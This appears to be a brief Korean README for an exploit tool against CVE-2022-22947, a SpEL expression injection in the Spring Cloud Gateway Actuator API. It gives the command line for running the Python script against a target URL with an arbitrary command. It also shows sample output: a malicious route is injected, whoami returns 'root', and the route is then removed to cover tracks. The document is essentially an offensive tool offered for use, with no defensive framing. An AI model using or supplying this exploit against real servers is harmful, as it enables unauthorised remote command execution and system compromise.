
Spring Cloud Gateway Actuator API SpEL 표현식 주입 명령 실행 Exp
Spring Cloud Gateway Actuator API SpEL 표현식 주입 명령 실행 Exp
사용:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" 결과: 악성 SpEL 표현식 라우트 추가 성공! 라우트 새로고침 성공! 공격 결과 획득 성공:
================================================ root
================================================ 악성 라우트 삭제 완료! 라우트 새로고침 성공!